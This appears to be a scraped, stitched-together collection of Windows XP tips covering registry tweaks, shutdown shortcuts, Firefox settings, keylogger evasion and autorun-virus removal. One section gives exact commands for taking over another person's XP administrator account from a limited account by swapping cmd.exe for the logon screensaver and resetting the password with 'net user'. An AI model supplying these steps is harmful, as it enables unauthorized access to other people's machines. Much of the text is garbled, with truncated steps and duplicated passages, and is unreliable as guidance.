Do u get irritated when acrobat reader takes 5/10 seconds to load when you want to open a pdf document. There is a way to speed up the loading.
1. Go to the installation folder of acrobat reader

How to Hide the drives(c,d....etc) in MY COMPUTER

This is a great trick you can play on your friends. To disable the display of local or networked drives when you click My Computer.
1.Go to start->run.Type regedit.Now go to:

Open Startmenu->Run type regedit and press ok to open registry editor.(shows a tree like structure of directories at left)
In that hierarchical structure in left, navigate to registry entry
HKEY_USERS\.DEFAULT\Control Panel\Desktop
In right side pane see a number of values placed in a table format. choose the value named Wallpaper from there and double click it. Now you see a box with value name as Wallpaper and value data as Path to the image file .There give the full path of the image(bmp file) which you want to set as logon wallpaper by deleting previous path and writing path to your bmp file e.g. C:\WINDOWS\lon.BMP (to set image lon.BMP file as log on wall paper).
Also double click on WallpaperStyle and change it’s value to 2 to get a stretched wallpaper at logon.
Put that bmp file in windows directory for better results.
If that is a jpeg file, convert to bmp file by opening in Windows Image Viewer and save as bmp.

To create a shutdown shortcut on the desktop

WindowsXP has a program called SHUTDOWN.EXE which allows you to easily create icons to shutdown or restart your computer.
To create a shutdown shortcut on the desktop:
Right click on an open area of the desktop
Select New / Shortcut
Enter in "shutdown -s -t 00" - (no quotes)
Press the Next button
For the name, enter in anything you like. I just use shutdown. Click the Finish button.
For a reboot, enter "shutdown -r -t 00"
Shutdown [{-l|-s|-r|-a}] [-f] [-m [\ComputerName]] [-t xx] [-c "message"] [-d[p]:xx:yy]
Parameters:
-l - Logs off the current user, this is also the defualt. -m ComputerName takes precedence.

• Make sure your logged on as actually "Administrator".
• Start->Run->type gpedit.msc
• Expand the "Local Computer Policy" branch.
• Expand the "Administrative Templates" branch.
• Expand the "Network Branch".
• Highlight the "QoS Packet Scheduler" in left window.
• In right window double-click the "Limit Reservable Bandwidth" setting.
• On setting tab check the "Enabled" item.
• Where it says "Bandwidth limit %" change it to read 0.
Effect is immediate on some systems, some need to re-boot. This is more of a "counter

Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.

SYSTEM INRUSION IN 15 SECONDS

System intrusion in 15 seconds, that’s right it can be done. If
you possess certain security flaws your system can be broken
into in less that 15 seconds.
To begin this chapter I’d like you to do the following. Connect to
the Internet using your dial up account if you are on dial up. If
you are on dedicated service like High Speed connections (ie,
Cable and DSL) then just proceed with the steps below.
• Click Start
• Go to Run
• Click Run (It’s a step by step manual) :-)
• Type Winipcfg
• Hit the Enter Key
This should bring up a window that looks like the following

What you should see under IP address is a number that looks
something like this.
207.175.1.1 (The number will be different.)
If you use Dial Up Internet Access then you will find your IP
address under PPP adapter. If you have dedicated access you

on the down arrow.
Once you have the IP address write it down, then close that
window by clicking (OK) and do the following.

turned on. This is how a “hacker” would check to see if you
have “file and printer sharing” turned on. If he/she becomes
aware of the fact that you do have “file and printer sharing”
turned on then they would proceed to attempt to gain access to
your system.

I’ll show you now how that information can be used to gain
access to your system.
A potential hacker would do a scan on a range of IP address for
systems with “File and Printer Sharing” turned on. Once they
have encountered a system with sharing turned on the next step
would be to find out what is being shared.

Q. The approximate time it takes for the average hacker to do
this attack?
R. 15 seconds or less.
Not a lot of time to gain access to your machine is it? How many
of you had “File and Printer Sharing” turned on?
Ladies and Gentlemen: This is called a Netbios attack. If you are
running a home network then the chances are you have file and
printer sharing turned on. This may not be the case for all of you
but I’m sure there is quite a number of you who probably do. If
you are sharing resources please password protect the
directories.
Any shared directory you have on your system within your
network will have a hand holding the folder. Which looks like
this.
You can check to find which folders are shared through Windows
Explorer.
• Click On Start
• Scroll Up to Programs
At this point you will see a listing of all the different programs on
your system
Find Windows Explorer and look for any folders that look like the
above picture.
Once you have found those folders password protect them. Don’t
worry I’ll show you how to accomplish this in Chapter 8 in a
visual step by step instruction format.
Netbios is one of the older forms of system attacks that occur. It
is usually overlooked because most systems are protected
against it. Recently there has been an increase of Netbios
Attacks.

Not a lot of time to gain access to your machine is it? How many
of you had “File and Printer Sharing” turned on?
Ladies and Gentlemen: This is called a Netbios attack. If you are
running a home network then the chances are you have file and
printer sharing turned on. This may not be the case for all of you
but I’m sure there is quite a number of you who probably do. If
you are sharing resources please password protect the
directories.
Any shared directory you have on your system within your
network will have a hand holding the folder. Which looks like
this.
You can check to find which folders are shared through Windows
Explorer.
• Click On Start
• Scroll Up to Programs
At this point you will see a listing of all the different programs on
your system
Find Windows Explorer and look for any folders that look like the
above picture.
Once you have found those folders password protect them. Don’t
worry I’ll show you how to accomplish this in Chapter 8 in a
visual step by step instruction format.
Netbios is one of the older forms of system attacks that occur. It
is usually overlooked because most systems are protected
against it. Recently there has been an increase of Netbios
Attacks.
HOW TO MAKE WINDOWS XP BOOT FASTER??

You can make Windows XP boot faster by 5 - 15 seconds (on some machines).
To do so do the following:
Start Registry Editor (Regedit.exe).
Locate the following key in the registry:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\MemoryManagement\PrefetchParameters
Make sure you backup the keys by exporting them to a .reg file.
On the EnablePrefetcher value, change the setting from 3 to 5 (decimal).
Close the registry editor.
Restart your computer.
To do so do the following:

How To Enter XP Even If You Forgot All Your Account's Passwords

There is a way (despite Microsoft claims that there's NO way aside from reinstalling a fresh copy of XP) to log 0n to your Windows XP system if ever you've forgotten all your users account passwords and don't have any administrator account to enter the system.
The truth is you don't need to install expensive 3rd party software or don't even need to be an expert to enter your locked XP system. What you just need is your Windows XP installer disc and your locked system to have an optical drive (of course). This is very handy if you forgot your administrator password and don't have any access to other account with administrator rights or if you're friend have also forgot his password.
Here's what you'll do if ever you forgot all your User Account's password and you thought (including Microsoft) that you can no longer enter your System.
Put the Windows XP installer disc into the optical drive (CD/DVD) and restart your PC.
Press any key when prompted with "Press any key to boot from CD", then wait for the "Welcome to setup" screen to appear, just press enter.
Then press F8 to agree on the license agreement.
On the next screen, you will be prompted to repair or install a fresh copy of Windows XP. You just need to select the locked Windows XP installation you want to enter (If you've more than one Windows XP installed) and press "R".
The system will then reboot after setup checked the disk and copied setup files (Just wait for the system to reboot). And when it reboots, don't press any key when prompted to "Press any key to boot from CD".
The setup will be automatically start the setup process. This is the most important steps, you need to wait for the setup to install the devices. Press the combination of SHIFT+F10 when you see the words "Installing Devices" at the bottom of the shown remaining minutes of the setup to finish.
After that, a command console will be open, where in you need to type "NUSRMGR.CPL" (Without the quotes).
You will be then given access to the User Account window similar to the control panel where you will delete or edit your forgotten password. Choose remove if you need to enter the system without entering password or edit if you want to change your forgotten password.
After you delete or edit your account password, close the command windows and let the setup to finish. (You will also be needing to enter the XP product key if prompted)
When setup is finished, system will reboot and you'll be automatically enter your system if you choose to delete the password or need to enter your new password if you just edit your forgotten password.

The first hack that I have here is the popular Firefox Minimize Hack that has recently flashed through the internet. The purpose of this hack tries to keep Firefox from eating up your physical RAM and instead puts the burden on your hard drive, or at least that is the general reason behind it. To implement this hack, perform the following steps.
1. With Firefox up and running, type about:config and hit enter.
2. Right click on the new page and select New -> Boolean.
3. In the pop-up window, type in “config.trim_on_minimize” without quotes and hit enter.
4. In the next pop-up window, select True and hit enter.
5. Restart your browser
Result:With that done, open up a bunch of tabs and monitor the memory usage. In my first run without this hack, Firefox was using 137.8 Mb of Ram. With all 30 tabs open again, Firefox was using 118.4 Mb, but when minimized this dropped to an astounding 4 Mb. However, this was too good to be true, I left Firefox minimized and came back 12 minutes later and the memory use had slowly creeped up to 42.4 Mb. While this was 10 times larger than the initial 4.2 Mb, I was still saving about 75 Mb.

If you're using the up and down arrows to go from line to line, holding down the CTRL key will make your cursor jump from paragraph to paragraph (well, from carriage return to carriage return anyway).
One last thing, if you hold down the SHIFT key while you do this (i.e. hold down SHIFT + CTRL at the same time), you select text as you arrow along.
I've tested this in MS Word and Wordpad, but it *should* work no matter what word processing program you use. HOME / END KEY FUN

PROTECT UR PASSWORDS IN CYBER CAFE OR PUBLUC COMPUTERS

Some time or the other, you must have used cyber dafe or public computers to access internet or mail.
Public computers are most prone to password hacking. Anyone can simply install a keylogger software to hack your password. Keylogging is one of the most insidious threats to a user's personal information. Passwords, credit card numbers etc. It is now very easy for the keylogger to harvest passwords. Each and every keystroke (whatever you type on the keyboard) gets recorded in the keylogger software and the person installing it can easily view what you have typd in. For example, if you go to hotmail.com and check your mails. Say your ID is sarahj7@hotmail.com and password is snoopy2. the keylogger software records your usename and password in its log file as

There's solution to this problem and you can easily fool the hacker.
The keylogger software sees and records everything,but it doesn't understand what it sees. I t does not know what to do with keys that are typed anywhere other than the password or user name fields.
So,between successive keys of the password if you enter random keys, the keylogger software wont ever come to konw where you typed in what..
In the process of recording the keys, the string that the keylogger receives will contain the password, but embedded in so much random junk that discovering it is infeasible.
So...
1.Go to hotmail.com or yahoo.com or any of the site where you need to insert a password or PIN.
2.Type in your user ID.
3. Type in the first characterof the password.
4. Click on the address bar in the internet explorer or Firefox. Type in some 3/4 random charachters.
5. Again go to password field and type in the second character of the password.And probably third too.
6. Again go to the addressbar and type in a few mroe random character.
7. Back to the password field and the next characters of the password.
Keep on repeatin the process till you type in the full password in the password field.
Instead of the password
snoopy2 the keylogger now gets:
hotmail.comspqmlainsdgsosdgfsodgfdpuouuyhdg2
Here a total of 26 random characters have been inserted among the 7 characters of the actual password!!!
No doubt it takes a little bit of more time than the usual process, but you're safe and secure that way!!!

Keylogging is one of the most insidious threats to a user's personal information. Passwords, credit card numbers etc. It is now very easy for the keylogger to harvest passwords. Each and every keystroke (whatever you type on the keyboard) gets recorded in the keylogger software and the person installing it can easily view what you have typd in. For example, if you go to hotmail.com and check your mails. Say your ID is sarahj7@hotmail.com and password is snoopy2. the keylogger software records your usename and password in its log file as
Microsoft Internet Explorer :
www.hotmail.comsarahj7@hotmail.comsnoopy2
Or
Firefox:
www.hotmail.comsarahj7@hotmail.comsnoopy2
Risky isnt it???!!!
There's solution to this problem and you can easily fool the hacker.
The keylogger software sees and records everything,but it doesn't understand what it sees. I t does not know what to do with keys that are typed anywhere other than the password or user name fields.
So,between successive keys of the password if you enter random keys, the keylogger software wont ever come to konw where you typed in what..
In the process of recording the keys, the string that the keylogger receives will contain the password, but embedded in so much random junk that discovering it is infeasible.
So...
1.Go to hotmail.com or yahoo.com or any of the site where you need to insert a password or PIN.
2.Type in your user ID.
3. Type in the first characterof the password.
4. Click on the address bar in the internet explorer or Firefox. Type in some 3/4 random charachters.
5. Again go to password field and type in the second character of the password.And probably third too.
6. Again go to the addressbar and type in a few mroe random character.
7. Back to the password field and the next characters of the password.
Keep on repeatin the process till you type in the full password in the password field.
Instead of the password
snoopy2 the keylogger now gets:
hotmail.comspqmlainsdgsosdgfsodgfdpuouuyhdg2
Here a total of 26 random characters have been inserted among the 7 characters of the actual password!!!
No doubt it takes a little bit of more time than the usual process, but you're safe and secure that way!!!
REMOVE D U AUTORUN VIRUSES

1) Open up Task Manager (Ctrl-Alt-Del)
2) If wscript.exe is running, end it.
3) If explorer.exe is running, end it.
4) Open up “File | New Task (Run)” in the Task manager
5) Run cmd
6) Run the following command on all your drives by replacing c:\ with other drives in turn (note: if you have autorun.inf files that you think you need to backup, do so now):
del c:\autorun.inf /f /a /s /q
7) Go to your Windows\System32 directory by typing cd c:\windows\system32
8) Type dir /a avp*.*
9) If you see any files names avp0.dll or avpo.exe or avp0.exe, use the following commands to delete each of them:
attrib -r -s -h avpo.exe
del avpo.exe
10) Use the Task Manager’s Run command to fire up regedit
11) Navigate to HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run (as usual, take a backup of your registry before touching it!)
12) If there are any entries for avpo.exe, delete them.
13) Do a complete search of your registry for ntde1ect.com and delete any entries you find.
14) Restart your computer.
